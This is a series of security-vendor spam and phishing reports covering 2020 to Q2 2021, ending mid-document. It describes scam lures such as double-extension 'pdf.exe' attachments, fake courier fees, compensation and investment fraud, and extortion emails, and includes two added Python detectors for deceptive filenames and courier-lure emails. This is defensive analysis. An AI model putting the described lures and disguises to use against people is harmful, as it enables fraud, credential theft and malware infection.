Cybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such “offers” usually require the victim to pay a small amount upfront to claim their non-existent reward.

Spam and phishing in Q2 2021: fake document comment with link to fraudulent website

In addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named “Договор №8883987726 от 10.10.2021.pdf.exe” (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.
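The “Договор … .pdf.exe” name works because mail clients and Explorer hide or de-emphasize the final extension, so the user sees a PDF. A mail gateway can catch the pattern before the user does. The function below is an added example, not Kaspersky’s detection logic: it normalizes an attachment filename, then flags document-lookalike executables, bare executables, bidi-override tricks, whitespace padding, and the archive and ISO containers the report lists as malware carriers. The extension lists are the author’s assumptions, not taken from the page.

```python
import re
import unicodedata
from typing import Optional

# Extensions Windows runs on double-click or via the shell (assumed list).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "wsh", "hta", "ps1", "lnk", "msi", "cpl", "dll"}
# Extensions a user reads as "a document" or "a picture" (assumed list).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "rtf", "odt", "xls", "xlsx", "ppt", "pptx",
                 "txt", "csv", "jpg", "jpeg", "png", "gif"}
# Containers the report names as carriers (RAR, ISO) plus common siblings; contents need inspection.
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img", "gz", "tar", "cab"}
# Unicode bidi controls, e.g. U+202E RIGHT-TO-LEFT OVERRIDE, used to visually reverse a name.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")


def classify_attachment_name(name: str) -> Optional[str]:
    """Return a reason string when the filename looks deceptive, else None."""
    if any(ch in BIDI_CONTROLS for ch in name):
        return "bidi-control-character"
    # NFKC folds look-alike punctuation (e.g. full-width U+FF0E) to an ASCII dot.
    norm = unicodedata.normalize("NFKC", name)
    if re.search(r"\s{3,}", norm):
        return "whitespace-padding"  # e.g. "report.pdf          .exe"
    # Windows drops trailing dots and spaces, so "file.exe. " is still an exe.
    parts = norm.strip().rstrip(". ").lower().split(".")
    if len(parts) < 2:
        return None
    final_ext, inner = parts[-1], parts[1:-1]
    if final_ext in EXECUTABLE_EXTS:
        doc = next((p for p in reversed(inner) if p in DOCUMENT_EXTS), None)
        if doc:
            return f"document-lookalike-executable:.{doc}.{final_ext}"
        return f"executable-attachment:.{final_ext}"
    if final_ext in ARCHIVE_EXTS:
        return f"archive-needs-inspection:.{final_ext}"
    return None


if __name__ == "__main__":
    # Constructed names, including the one quoted in the report.
    for n in ["Договор №8883987726 от 10.10.2021.pdf.exe", "invoice.pdf", "setup.exe",
              "scan.pdf        .exe", "photo\u202egpj.exe", "certificado.rar"]:
        print(repr(n), "->", classify_attachment_name(n))
```

The order of checks matters: bidi and padding are decided on the raw name, because normalization and splitting would otherwise discard exactly the evidence those tricks leave behind.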

Spam and phishing in Q2 2021: malicious spam

COVID-19 compensation fraud

In Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. “The UK Government” and “the US Department of the Treasury” were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.

Spam and phishing in Q2 2021: pandemic-related compensation fraud

It was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant’s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.

Spam and phishing in Q2 2021: yet another payout scam

Parcel scam: buy one, get none

Unexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the “mail company” could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.

Spam and phishing in Q2 2021: fake delivery emails

Mailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others’ parcels that for some reason could not reach the intended recipients. The “service” was positioned as a lottery — the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn’t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender’s expense. If the sender does not collect the returned item within the storage period, it is considered “unclaimed” and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.

Spam and phishing in Q2 2021: unclaimed parcels fraud

New movies: pay for the pleasure of not watching

Late April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the “subscription” the movie screening did not resume; instead the attackers had a new bank account to play with.

Spam and phishing in Q2 2021: Oscar-nominated movie fraud

In fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting Friends: The Reunion, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.

Spam and phishing in Q2 2021: Friends: The Reunion scam

Messenger spam: WhatsApp with that?

In messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.

Spam and phishing in Q2 2021: WhatsApp survey scam

WhatsApp was bought by Facebook in 2014. In early 2021, the two companies’ symbiotic relationship became a hot topic in connection with WhatsApp’s new privacy policy, allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with “beautiful strangers”. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.

Spam and phishing in Q2 2021: WhatsApp chat scam

Emails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.

Spam and phishing in Q2 2021: WhatsApp voice message fraud

Investments and public property scams

Offers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims’ money.

Spam and phishing in Q2 2021: gas-themed fraud

For more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims’ losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the “anti-fraudsters” was not without strings attached, despite the advertised free consultation. “Clients” who filled out the form were asked to pay a small fee for the refund, whereupon the “consultants” vanished without compensating so much as a dime.

Spam and phishing in Q2 2021: victim compensation fraud

Another high-earning scam cited client payouts under VTB Invest, VTB Bank’s digital asset management solution. Using the bank’s logos, the fraudsters offered “active banking users” the opportunity to receive “payout from investors.” After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the “payout” the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.

Spam and phishing in Q2 2021: VTB Invest payout fraud

Statistics: spam

Proportion of spam in mail traffic

After a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.

Share of spam in global mail traffic, Q1 and Q2 2021 (download)

A look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.

Source of spam by country

The TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.

Source of spam by country, Q2 2021 (download)

The Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).

Malicious mail attachments

Mail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.

Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 (download)

Peak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.

Malware families

In Q2, Trojans from the Badun family (7.09%) were the most common malicious attachments in spam, their share having increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, Agensla Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The Taskun family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.

TOP 10 malware families in mail traffic, Q2 2021 (download)

Exploits for CVE-2017-11882 (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious ISO disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect any (2.66%) or only 32-bit (2.47%) versions of Windows. Androm backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the SAgent (2.42%) and Agent (2.11%) families.

TOP 10 malicious attachments, Q2 2021 (download)

The TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the Crypt family (2.06%), which includes heavily obfuscated and encrypted programs.

Countries targeted by malicious mailings

More than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.

Countries targeted by malicious spam, Q2 2021 (download)

Further down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).

Statistics: phishing

In phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.

Geography of phishing attacks

Looking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It was not far ahead of Israel (6.55%) and France (6.46%), which topped the Q1 list.

Geography of phishing attacks, Q2 2021 (download)

Top-level domains

The traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.

Top-level domain zones most commonly used for phishing, Q2 2021 (download)

The fourth most popular domain zone among cybercriminals in Q2 was China’s CN (3.77%), followed by NET (3.53%). Russia’s RU (2.98%) dropped to sixth place, and Tokelau’s TK (1.65%) to eighth. Note also the cybercriminals’ preference for international domain zones (six of the ten lines in this quarter’s ranking).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

For the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter’s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.

Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 (download)

Overall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).

Conclusion

In Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.

As for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren’t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What’s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.

Spam and phishing in Q1 2021 (https://securelist.com/spam-and-phishing-in-q1-2021/102018/, published Mon, 03 May 2021)

Quarterly highlights

Banking phishing: new version of an old scheme

In Q1 2021, new banking scams appeared alongside more traditional ones. Clients of several Dutch banks faced a phishing attack using QR codes. The fraudsters invited the victim to scan a QR code in an email, ostensibly to unblock mobile banking. In actual fact, scanning the code could lead to a data leak or theft of money, or to device infection if the code contained a link to a web page hosting malware.

To lure users to their sites, phishers exploited the COVID-19 topic. In particular, in a newsletter purporting to be from the MKB bank, recipients were asked to catch up on the latest news about the pandemic and measures taken by the bank. The link pointed to a fake Outlook authorization page.

This past year, cybercriminals have actively exploited the topic of government payouts, most often in relation to damage caused by the pandemic. In Q1 2021, scammers imitating bank emails began to focus on compensation. The links in their messages took the victim to well-designed phishing pages with official emblems, business language and references to relevant laws. The attacks were mostly aimed at stealing bank card details and personal data.

However, users of specific banks were also targeted. In this case, the focus was on copying the external attributes of the bank’s website to create a near-indistinguishable phishing version.

Vaccine with cyberthreat

COVID-19 vaccination was one of the hottest global topics, and hence highly attractive to scammers. Cybercriminals took advantage of people’s desire to get vaccinated as quickly as possible. For instance, some UK residents received an email that appeared to come from the country’s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link.

In another mailing, the attackers focused on age — people over 65 were asked to contact a clinic to receive a vaccine.

In both cases, to make a vaccination appointment, a form had to be filled out with personal data; and in the first case, the phishers also wanted bank card details. If the victim followed all the instructions on the fake website, they handed their money and personal data to the attackers.

Another way to gain access to users’ personal data and purse strings was through fake vaccination surveys. Scammers sent out emails in the name of large pharmaceutical companies producing COVID-19 vaccines, or of certain individuals. The message invited the recipient to take part in a short survey.

Participants were promised a gift or cash reward for their help. After answering the questions, the victim was redirected to a page with the “gift.”

Having consented to receive the prize, the user was asked to fill out a detailed form with personal information. In some cases, the attackers also asked for payment of a token amount for delivery. However, if the victim went ahead and entered their bank card details, the amount charged was several times higher. Needless to say, no gift materialized.

The vaccination topic could hardly be ignored by spammers offering services on behalf of Chinese manufacturers. The emails mentioned lots of products related to diagnosis and treatment of the virus, but the emphasis was on the sale of vaccination syringes.

Such offers may look very favorable, but the likelihood of a successful deal is zero. Most if not all of the time, the “business partners” simply vanish into thin air after receiving the agreed prepayment.

Corporate segment: on-the-job fraud

Corporate usernames and passwords remain a coveted prize for scammers. To counter people’s increasingly wary attitude to emails from outside, attackers try to give their mailings a respectable look, disguising them as messages from business tools and services. By blending into the workflow, the scammers calculate that the user will be persuaded to follow the link and enter data on a fake page. For example, a “notification” from Microsoft Planner invited the user to review their tasks for the coming month. The link redirected them to a phishing page requesting their Microsoft account credentials.

In the Runet (Russian internet), we found an email seemingly from the support department of an analytics portal. The messages talked about recent updates and suggested checking the availability of the resource. The link also required entering corporate account credentials.

Old techniques, such as creating a unique fake page using JavaScript, were combined in Q1 with overtly business-themed phishing emails. Whereas scammers had previously used common, but not always business-oriented, services as bait, the new batch of emails cited an urgent document awaiting approval or a contract in need of review.

Every little bit helps

Since the end of last year, we have observed fraudulent emails and fake pages urging users to pay a small sum for certain services. The payment indicated in the fake email was often so tiny that the potential victim could ignore the risks. For example, in one of the emails below, the cybercriminals ask for just 1.99 rubles (US$0.027). The calculation was simple: users would be less averse to paying a small amount than a larger one, which means more potential victims willing to enter card details on the bogus site. To make the emails more convincing, they imitated commonly used services. Delivery services, whose messages are frequently faked, led the field: the potential victim was asked to pay for customs clearance or package delivery. However, the scammers did not fake the courier service emails very well: they were readily given away by the address in the From field or by the invalid tracking number indicated in the email.
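The two giveaways named above, a From address that does not belong to the impersonated courier and a tracking number that does not fit the courier's format, can be turned into mechanical triage checks. The following is an added example written for this report, not Kaspersky code; the brand name ExampleCourier, its allow-listed sender domains, the ten-digit tracking-number format and the sample messages are all constructed for illustration. It also flags a Reply-To domain that differs from the From domain, a third indicator of the same kind.

```python
"""Triage checks for courier-themed e-mail lures (added example, not Kaspersky code)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Hypothetical allow-list: sender domains the impersonated brand is known to use.
BRAND_DOMAINS = {
    "examplecourier": {"examplecourier.example", "mail.examplecourier.example"},
}

# Hypothetical tracking-number format for ExampleCourier: exactly ten digits.
TRACKING_RE = re.compile(
    r"tracking (?:number|no\.?|id)\s*[:#]?\s*([A-Za-z0-9-]+)", re.IGNORECASE
)
TRACKING_FORMAT = re.compile(r"^\d{10}$")

# Constructed sample messages: one genuine-looking notification, one lure.
SAMPLES = {
    "legit": (
        "From: ExampleCourier <noreply@examplecourier.example>\n"
        "Subject: Parcel update\n\n"
        "Tracking number: 1234567890\nYour parcel will arrive tomorrow.\n"
    ),
    "lure": (
        "From: ExampleCourier Delivery <notify@parcel-fee-update.example>\n"
        "Reply-To: pay@other.example\n"
        "Subject: Customs fee due\n\n"
        "Tracking number: EX-99\nPay 1.99 to release your parcel.\n"
    ),
}


def claimed_brand(display_name: str):
    """Return the brand a display name appears to claim, or None."""
    compact = re.sub(r"[^a-z]", "", display_name.lower())
    for brand in BRAND_DOMAINS:
        if brand in compact:
            return brand
    return None


def _domain(address: str) -> str:
    return address.rpartition("@")[2].lower()


def triage(raw_message: str) -> list[str]:
    """Return a list of indicator strings; an empty list means nothing was flagged."""
    msg = message_from_string(raw_message)
    findings = []

    display, sender = parseaddr(msg.get("From", ""))
    sender_domain = _domain(sender)
    brand = claimed_brand(display)
    if brand and sender_domain not in BRAND_DOMAINS[brand]:
        findings.append(f"from-domain-mismatch: '{display}' sent from {sender_domain}")

    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and _domain(reply_to) != sender_domain:
        findings.append(f"reply-to-mismatch: {reply_to}")

    # Only single-part text bodies are inspected in this example.
    body = msg.get_payload() if not msg.is_multipart() else ""
    for match in TRACKING_RE.finditer(body):
        number = match.group(1)
        if not TRACKING_FORMAT.match(number):
            findings.append(f"invalid-tracking-number: {number}")

    return findings


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, triage(raw) or "no findings")
```

The legitimate sample produces no findings; the lure is flagged three times. In practice the brand allow-list and the tracking format are the parts that need maintaining, and a single finding is a signal for review rather than proof of fraud.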

Besides delivery, scammers found other reasons for mailing out “invoices.” In particular, fake notifications about payment for domain usage or even an expired WhatsApp subscription did the rounds. In the latter case, the very mention of a paid subscription should sound an alarm, since even the business version of WhatsApp is free.

Although the scammers asked for a token payment in the email, in reality, if successful, they siphoned off far more than that from the victims’ account, and swiped their bank card details. This danger is ever-present when entering data on dubious websites.

Intrigue: emails from strangers

In March, we identified a targeted mailing to the addresses of an educational institution. The email reported a hack of the database of the school’s partner company, which resulted in the intruders getting their hands on the personal data of students and employees. The company refused to pay the ransom, so now the school administration must prepare for the worst: the data might find its way onto the darknet, and from there to even worse criminals, who could use it to enter the school building under the guise of an employee. To convince the school leaders of the reality of the looming threat, the email authors advised clicking the provided link and viewing a portion of the stolen database. The link led to a site in the .onion domain, which can only be opened using the Tor browser. Behind the link was a C&C server accessed by malware (various ransomware, including Trojan-Banker.Win32.Danabot). A link to this resource was also contained in ransom messages from the attackers, and in some cases malware was downloaded from it. If a curious employee visited this resource, they risked launching the ransomware in the school’s network or facing a demand to pay the ransom on behalf of the partner company.

Cybercriminals adopted an interesting tactic to attack Facebook users. The potential victim received an email saying that their account had violated the social network’s terms of use. To avoid the account being deleted, the scammers advised the recipient to follow the link and lodge an appeal. At the same time, the window for doing so was very short so as to hurry the victim into acting quickly without scrutinizing the message. The email would have been no different from any other aimed at stealing Facebook credentials, but for one nuance: the link in the message pointed to an actual Facebook page.

Resembling an official notice, the page stated that an erroneous decision to block an account could be disputed by following the link provided. In reality, it was a note in a Facebook user’s profile, which the sharp-eyed user could have discerned from the word “notes” in the address. Clicking the link in the note took the victim straight to a phishing site. The attackers’ calculation was simple: first lull the victim’s vigilance with a legitimate link, then get them to enter their credentials on a fake page.

Statistics: spam

Proportion of spam in mail traffic

In Q1 2021, the share of spam in global mail traffic continued to decline and averaged 45.67%, down 2.11 p.p. against Q4 2020 (47.78%).

Proportion of spam in global email traffic, Q4 2020 and Q1 2021

The highest percentage of junk mail was recorded in January (46.12%). This is 0.71 p.p. less than the lowest figure in 2020 (46.83%). The calmest month was March, in which spam accounted for only 45.10% of all emails.

In the Runet, the average share of spam was also lower than in Q4: 48.56% versus 50.25%. As was generally the case worldwide, the most turbulent month of the reporting period was January (49.76%), and the quietest was March (47.17%). In contrast to the global picture, January’s share of spam in the Runet was 1.30 p.p. higher than December’s (49.76% versus 48.46%).

Proportion of spam in Runet mail traffic, Q4 2020 and Q1 2021

Sources of spam by country

In 2020, Russia and Germany led the pack by volume of outgoing spam. In Q1 2021, they remained out in front: Russia accounted for 22.47% of spam, and Germany’s share was 14.89%. Third place went to the US (12.98%), and fourth to China (7.38%).

Sources of spam by country, Q1 2021

The Netherlands (4.18%) ranked fifth, followed by France (3.69%) and Spain (3.39%). Poland (2.39%), Brazil (2.37%) and Japan (2.23%) round out the Top 10.

Malicious mail attachments

In Q1 2021, Kaspersky solutions detected 38,195,315 malicious mail attachments. This is almost 3 million fewer than in the last three months of 2020. That said, the number of attachments blocked by Mail Anti-Virus grew during the quarter.

Number of Mail Anti-Virus triggerings, Q4 2020 and Q1 2021

Malware families

The most common Trojans detected by our solutions in mail attachments came from the Agensla family (8.91%). These malicious programs specialize in stealing credentials from browsers, as well as from mail and FTP clients. In second place came exploits for the CVE-2017-11882 vulnerability in the Microsoft Equation Editor component, which were detected in 6.38% of cases. Third position this time was taken by Trojans from the Badun family (5.79%). Malicious programs disguised as e-documents are detected with this verdict. Malware from the Badun family most often spreads through archives.

Top 10 malware families in mail traffic, Q1 2021

Fourth place went to SAgent (4.98%) — documents containing a VBA script that runs PowerShell to covertly download other malware. The fifth- and sixth-placed families are Taskun (3.79%) — programs that create malicious tasks in Windows Task Scheduler, and ISO (3.69%) — malicious disk images distributed by email. In seventh place is the Noon spyware (2.41%), which steals passwords from browsers and reads keystrokes. In eighth is the Crypt family (2.16%), which consists of highly obfuscated or encrypted software. The Top 10 is rounded out by Androm backdoors (2.05%) and worms coded in Visual Basic (1.66%).

Top 10 malicious attachments, Q1 2021

The Top 10 most common malicious attachments in Q4 corresponds exactly to the ranking of families. This suggests that each of the above-described families was widespread largely due to one member.

Countries targeted by malicious mailings

Our solutions registered the largest number of attempts to open malicious attachments in Spain (8.74%). This country was the top malicious mailing target throughout 2020, and held on to first place in this reporting quarter. Italy (7.59%) moved up to second place, and third place went to Germany (5.84%).

Countries targeted by malicious mailings, Q1 2021

In fourth position in Q1 was the UAE (5.25%), with Russia (4.88%) closing out the Top 5.

Statistics: phishing

In Q1 2021, our Anti-Phishing system prevented 79,608,185 attempted redirects to fraudulent websites. 5.87% of Kaspersky users encountered phishing, and 695,167 new masks were added to the anti-phishing databases.

Geography of phishing attacks

This quarter, phishing attacks affected a relatively small proportion of our users, both overall and in specific countries. The leader was France, where 9.89% of all users of Kaspersky solutions tried to follow a fraudulent link at least once during the reporting period.

Distribution of phishing attacks by country, Q1 2021

Israel placed second and Hungary third, where 8.45% and 8.27% of users, respectively, encountered phishing pages. Meanwhile, Brazil (7.94%), which topped the rating in 2020, only managed ninth position in Q1.

Top-level domains

As usual, the largest share of phishing sites that users attempted to visit in the period January–March 2021 were located in the .com domain zone (32.80%). The second most popular domain among scammers this time around was .xyz (11.38%). Bronze goes to the .tk domain zone (3.24%), belonging to the Tokelau Islands, a dependent territory of New Zealand, in the Pacific Ocean. Tokelau domains are cheap to rent, and so popular with phishers.

Top-level domain zones most commonly used for phishing, Q1 2021

Also prevalent this quarter were phishing sites that were not assigned domain names (2.78%). Such resources were the fourth most popular. In fifth spot, just 0.01 p.p. behind, was the Russian domain .ru (2.77%).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

The Top 10 organizations used by phishers as bait remained practically unchanged in Q1 relative to 2020. Online stores (15.77%) still lead the way, followed by global internet portals (15.50%) and banks (10.04%). Fraudsters’ continued targeting of users of electronic trading platforms is explained by the pandemic-related restrictions that remained in force in many countries this quarter.

Distribution of organizations targeted by phishers, by category in Q1 2021

Conclusion

In Q1 2021, we largely saw a continuation of the 2020 trends. Cybercriminals are still actively using the COVID-19 theme to entice potential victims. And as coronavirus vaccination programs have been rolled out, spammers have adopted it as bait. Corporate account hunters continue to hone their techniques to make their emails as convincing as possible. Meanwhile, phishers who prey on personal accounts are still actively spoofing the websites of online stores, which have risen in popularity due to the pandemic.

Attackers will likely carry on exploiting the COVID-19 vaccination topic in Q2, and we can expect new fraudulent schemes to emerge. Scams related to compensation for damages caused to individuals and companies worldwide will not go away any time soon either, and Q2 may see an associated rise in the number of fraudulent schemes offering payments from governments or other structures. As the summer season approaches, an increase in the number of emails related to tourism is possible; however, due to the pandemic, it is likely to be small. On the other hand, cybercriminals will almost certainly continue to actively hunt corporate account credentials, exploiting the fact that many companies are still in remote working mode and communication among employees is predominantly online.

Spam and phishing in 2020 (https://securelist.com/spam-and-phishing-in-2020/100512/, Mon, 15 Feb 2021 10:00:38 +0000)

Figures of the year

In 2020:

  • The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.
  • Most spam (21.27%) originated in Russia.
  • Kaspersky solutions detected a total of 184,435,643 malicious attachments.
  • The email antivirus was triggered most frequently by email messages containing members of the Trojan.Win32.Agentb malware family.
  • The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.
  • The most frequent targets of phishing attacks were online stores (18.12%).

Contact us to lose your money or account!

In their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them. Various pretexts were given for requesting the user to get in touch with “support”: order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was requested to call a support number stated in the email. Most legitimate messages give recipients constant warnings of the dangers of opening links that arrive by email. An offer to call back was supposed to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use these. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than to look for a contact number or wait for a written response from support.

The contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting on the visitor to turn their attention to the number and unsettling warning message against the red background, rather than the address bar of the fake website.

We assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.

Reputation, bitcoins or your life?

In 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening adversity for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos. In a reflection of the current trends for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of “Nigerian” scammers, who pose as real political figures or their relatives, offering tons of money, or otherwise link their messages with concurrent global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.

This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company’s reputation even more, should it fail to pay up, by stealing confidential information, specifically, its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats. For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or Turla.

The senders of an email that talked about a bomb planted in a company’s offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the “attack”: an intention to detonate the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.

Attacks on the corporate sector

